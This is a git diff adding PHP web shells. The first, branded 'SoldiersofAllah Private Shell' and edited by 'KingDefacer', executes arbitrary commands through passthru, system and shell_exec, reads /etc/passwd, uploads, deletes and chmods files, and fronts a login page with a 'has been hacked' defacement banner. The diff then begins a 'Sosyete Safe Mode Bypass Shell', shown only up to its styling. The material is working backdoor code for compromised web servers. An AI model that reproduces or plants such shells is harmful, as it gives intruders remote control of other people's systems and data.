+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Soldiers of Allah private shell.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+
+<title>SoldiersofAllah Private Shell | Edited By KingDefacer ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Linux/Unix Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About US</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3 color="green">SoldiersOfAllah private shell</b></font><br>Modified by cyberkalashnikov
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+<center><font size="2">In The Name Of Allah</font></center>
+Dedicated for all of SoldiersOfAllah members
+
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+
+
+
+<?php
+}
+} 
+
+else {
+?>
+<html>
+<title>Login Step ~ <?php print getenv("HTTP_HOST"); ?></title>
+<style type="text/css">
+/* Circle Text Styles */
+#outerCircleText {
+/* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
+font-style: italic;
+font-weight: bold;
+font-family: 'comic sans ms', verdana, arial;
+color: #ff0000;
+/* End Optional */
+/* Start Required - Do Not Edit */
+position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
+#outerCircleText div {position: relative;}
+#outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
+/* End Required */
+/* End Circle Text Styles */
+</style>
+<script type="text/javascript">
+
+;(function(){
+
+var msg = "";
+var size = 24;
+var circleY = 0.75; var circleX = 2;
+var letter_spacing = 5;
+var diameter = 10;
+
+var rotation = 0.4;
+var speed = 0.3;
+////////////////////// Stop Editing //////////////////////
+if (!window.addEventListener && !window.attachEvent || !document.createElement) return;
+msg = msg.split(');
+var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
+ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
+o = document.createElement('div'), oi = document.createElement('div'),
+b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,
+mouse = function(e){
+e = e || window.event;
+ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
+xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
+},
+makecircle = function(){ // rotation/positioning
+if(init.nopy){
+o.style.top = (b || document.body).scrollTop + 'px';
+o.style.left = (b || document.body).scrollLeft + 'px';
+};
+currStep -= rotation;
+for (var d, i = n; i > -1; --i){ // makes the circle
+d = document.getElementById('iemsg' + i).style;
+d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
+d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
+};
+},
+drag = function(){ // makes the resistance
+y[0] = Y[0] += (ymouse - Y[0]) * speed;
+x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
+for (var i = n; i > 0; --i){
+y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
+x[i] = X[i] += (x[i-1] - X[i]) * speed;
+};
+makecircle();
+},
+init = function(){ 
+if(!isNaN(window.pageYOffset)){
+ymouse += window.pageYOffset;
+xmouse += window.pageXOffset;
+} else init.nopy = true;
+for (var d, i = n; i > -1; --i){
+d = document.createElement('div'); d.id = 'iemsg' + i;
+d.style.height = d.style.width = a + 'px';
+d.appendChild(document.createTextNode(msg[i]));
+oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
+};
+o.appendChild(oi); document.body.appendChild(o);
+setInterval(drag, 25);
+},
+ascroll = function(){
+ymouse += window.pageYOffset;
+xmouse += window.pageXOffset;
+window.removeEventListener('scroll', ascroll, false);
+};
+o.id = 'outerCircleText'; o.style.fontSize = size + 'px';
+if (window.addEventListener){
+window.addEventListener('load', init, false);
+document.addEventListener('mouseover', mouse, false);
+document.addEventListener('mousemove', mouse, false);
+if (/Apple/.test(navigator.vendor))
+window.addEventListener('scroll', ascroll, false);
+}
+else if (window.attachEvent){
+window.attachEvent('onload', init);
+document.attachEvent('onmousemove', mouse);
+};
+})();
+</script>
+
+</head>
+<body>
+<script>
+
+var text=new Array()
+var textsplashcolors=new Array()
+
+
+text[0]=""
+text[1]=""
+text[2]=""
+text[3]=""
+text[4]=""
+text[5]=""
+
+ 
+textsplashcolors[0]="Black"
+textsplashcolors[1]="Black"
+textsplashcolors[2]="Black"
+textsplashcolors[3]="Black"
+textsplashcolors[4]="Black"
+textsplashcolors[5]="Black"
+textsplashcolors[6]="Black"
+
+// the font
+var textfont="Ayasmonika"
+
+// the font-size for IE4x/5x/6x and NS6x (CSS-standard)
+var textfontsize=14
+
+// the font size for NS4x (HTML-standard)
+var textfontsizeHTML=4
+
+// the pause between the messages (seconds)
+var textpause=2
+
+// Do not edit below this line
+var textweight="bold"
+var textweightA="<b>"
+var textweightB="</b>"
+var textitalic="normal"
+var textitalicA=""
+var textitalicB=""
+var textalignabsolute="topcenter"
+var letterwidth=new Array()
+var messagewidth=0
+var messageheight=1
+var i_colors=0
+var letterspace=Math.floor(textfontsize/1.3)
+var timer
+var i_text=0
+var textsplitted
+var i_textpath=0
+var endpause=1
+var endpausemilli=endpause*10
+var maxtextlength=0
+var i_endposition=0
+var windowwidth=0
+var windowheight=0
+var windowwidthfactor=1
+var windowheightfactor=1
+var i_span=0
+var startposmax_x=0
+var startposmax_y=0
+textpause*=1000
+var x_step=new Array()
+var y_step=new Array()
+var x_finalpos=new Array()
+var y_finalpos=0
+var max_loop=20
+var i_loop=0
+
+var ns4=document.layers?1:0
+var ns6=document.getElementById&&!document.all?1:0 
+var ie=document.all?1:0
+
+for (i=0;i<=text.length-1;i++) {
+	if (text[i].length>=maxtextlength) {maxtextlength=text[i].length}
+}
+for (i=0;i<=text.length-1;i++) {
+	text[i]=text[i]+" "
+}
+
+var xpos=new Array()
+for (i=0;i<=maxtextlength;i++) {
+	xpos[i]=5000
+}
+
+var ypos=new Array()
+for (i=0;i<=maxtextlength;i++) {
+	ypos[i]=5000
+}
+
+function randomizer(range) {		
+	return Math.floor(range*Math.random())
+}
+
+function getpagesize() {
+	if (ie) {
+		windowheight=parseInt(document.body.clientHeight)
+		windowwidth=parseInt(document.body.clientWidth)
+	}
+	if (ns4 || ns6) {
+		windowheight=parseInt(window.innerHeight)
+		windowwidth=parseInt(window.innerWidth)
+	}
+	startposmax_x=windowwidth-2*parseInt(textfontsize)
+	startposmax_y=windowheight-2*parseInt(textfontsize)
+
+	changecontent()
+}
+
+function changecontent() {
+		messagewidth=0
+		var textsa=text[i_text]
+		textsplitted=textsa.split("")
+		if (ie) {
+			for (i=0;i<=textsplitted.length-1;i++) {
+				var thisspan=eval("document.all.span"+i)
+    			thisspan.innerHTML="<span style='font-family:"+textfont+";font-size:"+textfontsize+";font-style:"+textitalic+";font-weight:"+textweight+";color:"+textsplashcolors[i_colors]+";text-align:center'>"+textsplitted[i]+"</span>"
+				i_colors++
+				if (i_colors>textsplashcolors.length-1) {i_colors=0}
+				letterwidth[i]=Math.round(thisspan.offsetWidth*1.2)
+				
+				if (letterwidth[i]==0) {letterwidth[i]=parseInt(textfontsize)}
+				messagewidth+=letterwidth[i]
+				messageheight=Math.round(document.all.span0.offsetHeight)
+			}
+		}
+		if (ns6) {
+			for (i=0;i<=textsplitted.length-1;i++) {
+				var thisspan=eval(document.getElementById('span'+i))
+    			thisspan.innerHTML="<span style='font-family:"+textfont+";font-size:"+textfontsize+";font-style:"+textitalic+";font-weight:"+textweight+";color:"+textsplashcolors[i_colors]+"'>"+textsplitted[i]+"</span>"
+				i_colors++
+				if (i_colors>textsplashcolors.length-1) {i_colors=0}
+				letterwidth[i]=Math.round(parseInt(thisspan.offsetWidth)*1.2)
+				if (letterwidth[i]==0) {letterwidth[i]=textfontsize}
+				messagewidth+=letterwidth[i]
+				messageheight=Math.round(document.getElementById('span0').offsetHeight)
+			}
+			
+		}
+		if (ns4) {
+			for (i=0; i<textsplitted.length-1; i++) {
+    			var thisspan=eval("document.span"+i+".document")
+    			thisspan.write("<p><font size="+textfontsizeHTML+" color="+textsplashcolors[i_colors]+" face="+textfont+">"+textitalicA+textweightA+textsplitted[i]+textweightB+textitalicB+"</font></p>")
+				thisspan.close()
+				letterwidth[i]=Math.round(thisspan.width*1.2)
+				if (letterwidth[i]==0) {letterwidth[i]=textfontsize}
+				messagewidth+=letterwidth[i]
+				messageheight=Math.round(document.span0.document.height)
+				thisspan.clear()
+				i_colors++
+				if (i_colors>textsplashcolors.length-1) {i_colors=0}
+    		}
+			for (i=0; i<textsplitted.length-1; i++) {
+    			var thisspan=eval("document.span"+i)
+    			thisspan.visibility="show"
+    		}
+		}
+		i_text++ 
+		if (i_text>=text.length) {i_text=0}
+		getfinalpos()
+}
+
+function getfinalpos() {
+	if (ie || ns6) {var padding_x=100}; if (ns4) {var padding_x=40};
+	if (ie || ns6) {var padding_y=80}; if (ns4) {var padding_y=40};
+	if (textalignabsolute=="middlecenter") {
+		x_finalpos[0]=(windowwidth-messagewidth)/2
+		y_finalpos=(windowheight-messageheight)/2
+	}
+	else if (textalignabsolute=="topleft") {
+		x_finalpos[0]=5
+		y_finalpos=0
+	}
+	else if (textalignabsolute=="topcenter") {
+		x_finalpos[0]=(windowwidth-messagewidth)/2
+		y_finalpos=0
+	}
+	else if (textalignabsolute=="topright") {
+		x_finalpos[0]=windowwidth-messagewidth
+		y_finalpos=0
+	}
+	else if (textalignabsolute=="bottomleft") {
+		x_finalpos[0]=5
+		y_finalpos=windowheight-messageheight
+	}
+	else if (textalignabsolute=="bottomcenter") {
+		x_finalpos[0]=(windowwidth-messagewidth)/2
+		y_finalpos=windowheight-messageheight
+	}
+	else if (textalignabsolute=="bottomright") {
+		x_finalpos[0]=windowwidth-messagewidth
+		y_finalpos=windowheight-messageheight
+	}
+	for (i=1;i<textsplitted.length-1;i++) {
+		x_finalpos[i]=x_finalpos[i-1]+letterwidth[i-1]
+	}
+	gotostartpos()
+}
+
+function gotostartpos() {
+	if (ie) {
+		for (i=0;i<textsplitted.length-1;i++) {
+			var thisspan=eval("document.all.span"+i+".style")
+			thisspan.posLeft=randomizer(startposmax_x)
+			thisspan.posTop=randomizer(startposmax_y)
+		}
+	}
+	if (ns4) {
+		for (i=0;i<textsplitted.length-1;i++) {
+			var thisspan=eval("document.span"+i)
+			thisspan.left=randomizer(startposmax_x)
+			thisspan.top=randomizer(startposmax_y)
+		}
+	}
+	if (ns6) {
+		for (i=0;i<textsplitted.length-1;i++) {
+			var thisspan=eval("document.getElementById('span'+i).style")
+			thisspan.left=randomizer(startposmax_x)
+			thisspan.top=randomizer(startposmax_y)
+		}
+	}
+	gotostandstillpos()
+}
+
+function gotostandstillpos() {
+	if (ie) {
+		if (i_loop<=max_loop-1) {
+			for (i=0;i<textsplitted.length-1;i++) {
+				var thisspan=eval("document.all.span"+i+".style")
+				x_step[i]=(x_finalpos[i]-thisspan.posLeft)/(max_loop-i_loop)
+				y_step[i]=(y_finalpos-thisspan.posTop)/(max_loop-i_loop)		
+				thisspan.posLeft+=x_step[i]
+				thisspan.posTop+=y_step[i]
+			}
+			i_loop++
+			var timer=setTimeout("gotostandstillpos()",20)
+		}
+		else {
+			i_loop=0
+			clearTimeout(timer)
+			timer=setTimeout("gotoendpos()",textpause)
+		}
+	}
+	if (ns4) {
+		if (i_loop<=max_loop-1) {
+			for (i=0;i<textsplitted.length-1;i++) {
+				var thisspan=eval("document.span"+i)
+				x_step[i]=(x_finalpos[i]-thisspan.left)/(max_loop-i_loop)
+				y_step[i]=(y_finalpos-thisspan.top)/(max_loop-i_loop)		
+				thisspan.left+=x_step[i]
+				thisspan.top+=y_step[i]
+			}
+			i_loop++
+			var timer=setTimeout("gotostandstillpos()",20)
+		}
+		else {
+			i_loop=0
+			clearTimeout(timer)
+			timer=setTimeout("gotoendpos()",textpause)
+		}
+	}
+	if (ns6) {
+		if (i_loop<=max_loop-1) {
+			for (i=0;i<textsplitted.length-1;i++) {
+				var thisspan=eval("document.getElementById('span'+i).style")
+				x_step[i]=(x_finalpos[i]-parseInt(thisspan.left))/(max_loop-i_loop)
+				y_step[i]=(y_finalpos-parseInt(thisspan.top))/(max_loop-i_loop)		
+				thisspan.left=parseInt(thisspan.left)+x_step[i]
+				thisspan.top=parseInt(thisspan.top)+y_step[i]
+			}
+			i_loop++
+			var timer=setTimeout("gotostandstillpos()",20)
+		}
+		else {
+			i_loop=0
+			clearTimeout(timer)
+			timer=setTimeout("gotoendpos()",textpause)
+		}
+	}
+}
+
+function gotoendpos() {
+	if (ie) {
+		if (i_loop<=textsplitted.length-1) {
+			var thisspan=eval("document.all.span"+i_loop+".style")
+			thisspan.posLeft=-1000
+			i_loop++
+			var timer=setTimeout("gotoendpos()",10)
+		}
+		else {
+			clearTimeout(timer)
+			i_loop=0
+			var timer=setTimeout("changecontent()",400)
+		}
+	}
+	if (ns4) {
+		if (i_loop<=textsplitted.length-1) {
+			var thisspan=eval("document.span"+i_loop)
+			thisspan.left=-1000
+			i_loop++
+			var timer=setTimeout("gotoendpos()",10)
+		}
+		else {
+			clearTimeout(timer)
+			i_loop=0
+			changecontent()
+		}
+	}
+	
+	if (ns6) {
+		if (i_loop<=textsplitted.length-1) {
+			var thisspan=eval("document.getElementById('span'+i_loop).style")
+			thisspan.left=-1000
+			i_loop++
+			var timer=setTimeout("gotoendpos()",10)
+		}
+		else {
+			clearTimeout(timer)
+			i_loop=0
+			changecontent()
+		}
+	}
+}
+
+if (ie) {
+	for (i=0;i<=maxtextlength;i++) {
+    	document.write("<span id='span"+i+"' style='position:absolute'>")
+		
+    	document.write("</span>")
+	}
+	window.onload=getpagesize
+}
+if (ns6) {
+	for (i=0;i<=maxtextlength;i++) {
+    	document.write("<span id='span"+i+"' style='position:absolute'>")
+		document.write(textsplitted)
+    	document.write("</span>")
+	}
+	window.onload=getpagesize
+}
+if (ns4) {
+	for (i=0;i<=maxtextlength;i++) {
+    	document.write("<layer name='span"+i+"' visibility=hide>")
+		document.write(textsplitted)
+    	document.write("</layer>")
+	}
+	window.onload=getpagesize
+}
+var backgroundcolor="black"
+</script>
+<center>
+<br><br>
+<img src="http://i335.photobucket.com/albums/m469/dna_keylogger/t.jpg" border="0" alt="Tawheed"></a>
+<style type="text/css">td{color:#000000;font-size:10pt;font-family:Arial;}input,option{background-color:#FFFFAA;font-family:Arial;}</style>
+
+<center>
+<script>
+var message=new Array()
+message[0]="Welcome to Soldiers of Allah Shell"
+message[1]="Before You Use This Stuff"
+message[2]="Please Login Before"
+message[3]="Soldiers of Allah has been hacked Your system"
+
+// enter the width and height of the ticker (pixel)
+var tickerwidth=750
+var tickerheight=350
+
+// enter font
+var tickerfont="Arial"
+
+// enter font-size
+var tickerfontsize=6
+
+// enter the three font-colors
+var tickerfontcolorpre="White"
+var tickerfontcolormark="Green"
+var tickerfontcolorafter="Gold"
+
+// enter the background-color
+var backgroundcolor="black"
+
+// enter the pause between each word marked (1000 = 1 second)
+var pausebetweenwords=200 
+
+// enter the pause between each message (1000 = 1 second)
+var pausebetweenmessages=1000
+
+// enter the pause after the fade effect (1000 = 1 second)
+var pauseafterfade=1000
+
+// do not edit the code below this line
+var transparency=100
+var transparencystep=5
+var windowheight=0
+var windowwidth=0
+var x_pos=0
+var y_pos=0
+var i_message=-1
+var messagesplit=""
+var i_messagesplit=0
+var i_mark=0
+var tickercontent
+var pausefade=40
+var linkurlloaded=false
+var oneloopfinished=false
+var ns4=document.layers?1:0
+var ns6=document.getElementById&&!document.all?1:0 
+var ie=document.all?1:0
+
+function splitmessage() {
+	transparency=100
+	if (ie) {
+		i_message++
+		if (i_message>=message.length) {oneloopfinished=true}
+		if (i_message>=message.length) {i_message=0}
+		i_mark=0
+		messagesplit=message[i_message].split(" ")
+		for (i=0;i<messagesplit.length;i++) {
+			messagesplit[i]=messagesplit[i]+" "
+		}
+		messagesplit[messagesplit.length]=" "
+
+		document.all.ticker.filters.alpha.opacity=transparency
+		if (oneloopfinished && linkurlloaded) {
+			document.location.href=linkurl
+		}
+		else {
+			runticker()
+		}
+	}
+	else if (ns6 || ns4) {
+		i_message++
+		if (i_message>=message.length) {document.location.href=linkurl}
+		else {
+			i_mark=0
+			messagesplit=message[i_message].split(" ")
+			for (i=0;i<messagesplit.length;i++) {
+				messagesplit[i]=messagesplit[i]+" "
+			}
+			messagesplit[messagesplit.length]=" "
+			if (ns6) {
+				document.getElementById('ticker').style.MozOpacity=transparency/100
+			}
+			runticker()
+		}
+	}
+	else {
+		document.location.href=linkurl
+	}
+}
+
+function runticker() {
+	if (i_mark<messagesplit.length) {
+		gettickercontent()
+			
+		if (ie) {
+			ticker.innerHTML=tickercontent
+		}
+		if (ns6) {
+			document.getElementById('ticker').innerHTML=tickercontent
+		}
+		if (ns4) {
+			document.ticker.document.write(tickercontent)
+			document.ticker.document.close()
+		}
+  		i_mark++
+				
+  		var tickertimer=setTimeout("runticker()",pausebetweenwords)
+
+	}
+	else {
+		clearTimeout(tickertimer)
+		setTimeout("fade()",pausebetweenmessages)
+	}
+}
+
+function fade() {
+	if (transparency>0){
+		transparency-=transparencystep
+		if (ie) {
+			document.all.ticker.filters.alpha.opacity=transparency
+		}
+		if (ns6) {
+			document.getElementById('ticker').style.MozOpacity=transparency/100
+		}
+		var fadetimer=setTimeout("fade()",pausefade)
+	}
+	else {
+		clearTimeout(fadetimer)
+		setTimeout("splitmessage()",pauseafterfade)
+	}
+}
+
+function gettickercontent() {
+		
+	tickercontent="<table width="+tickerwidth+" height="+tickerheight+" cellpadding=0 cellspacing=0 border=0><tr valign=middle><td align=center>"
+	tickercontent+="<font face=\""+tickerfont+"\" size="+tickerfontsize+" color=\""+tickerfontcolorpre+"\">"
+	for (i=0;i<i_mark;i++) {
+		tickercontent+=messagesplit[i]
+	}
+	tickercontent+="</font>"
+	tickercontent+="<font face=\""+tickerfont+"\" size="+tickerfontsize+" color=\""+tickerfontcolormark+"\">"
+	tickercontent+=messagesplit[i_mark]
+	tickercontent+="</font>"
+	tickercontent+="<font face=\""+tickerfont+"\" size="+tickerfontsize+" color=\""+tickerfontcolorafter+"\">"
+	for (i=(i_mark+1);i<messagesplit.length;i++) {
+		tickercontent+=messagesplit[i]
+	}
+	tickercontent+="</font>"
+	tickercontent+="</td></tr></table>"
+
+}
+
+setposition()
+function setposition() {
+	if (ie) {
+		windowheight=document.body.clientHeight
+		windowwidth=document.body.clientWidth
+	}
+	if (ns6) {
+		windowheight=window.innerHeight
+		windowwidth=window.innerWidth
+	}
+	if (ns4) {
+		windowheight=window.innerHeight
+		windowwidth=window.innerWidth
+	}
+	x_pos=(windowwidth-tickerwidth)/2
+	y_pos=(windowheight-tickerheight)/2
+	document.bgColor=backgroundcolor
+}
+function jump() {
+	linkurlloaded=true
+}
+
+if (ie) {
+	document.write("<div id=\"ticker\" style=\"position:absolute;top:"+y_pos+"px;left:"+x_pos+"px;width:"+tickerwidth+"px;height:"+tickerheight+"px;overflow:hidden\;filter:alpha(opacity=100);-moz-opacity:100\">")
+	document.write("</div>")
+	document.write("<iframe onLoad=\"jump()\" src="+linkurl+" width=0 height=0></iframe>")
+	splitmessage()
+}
+else if (ns6) {
+	document.write("<div id=\"ticker\" style=\"position:absolute;top:"+y_pos+"px;left:"+x_pos+"px;width:"+tickerwidth+"px;height:"+tickerheight+"px;overflow:hidden\;-moz-opacity:100\">")
+	document.write("</div>")
+	splitmessage()
+}
+else if (ns4) {
+	document.write("<layer name=\"ticker\" width="+tickerwidth+" height="+tickerheight+" top="+y_pos+" left="+x_pos+">")
+	document.write("tickercontent")
+	document.write("</layer>")
+	document.close()
+	window.onload=splitmessage
+}
+else {
+	document.location.href=linkurl
+}
+</script></center>
+
+</body>
+</html>
+<?php print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST><font color=white>Please login before use your stuff</font><br><b></b><input type=login name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>
diff --git a/php/sosyete.php b/php/sosyete.php
new file mode 100644
index 0000000..41e69ef
--- /dev/null
+++ b/php/sosyete.php
@@ -0,0 +1,221 @@
+<html>
+ <head>
+   <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa">
+   <title>Sosyete Safe Mode Bypass Shell - Edited By KingDefacer</title>
+ 
+   <style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
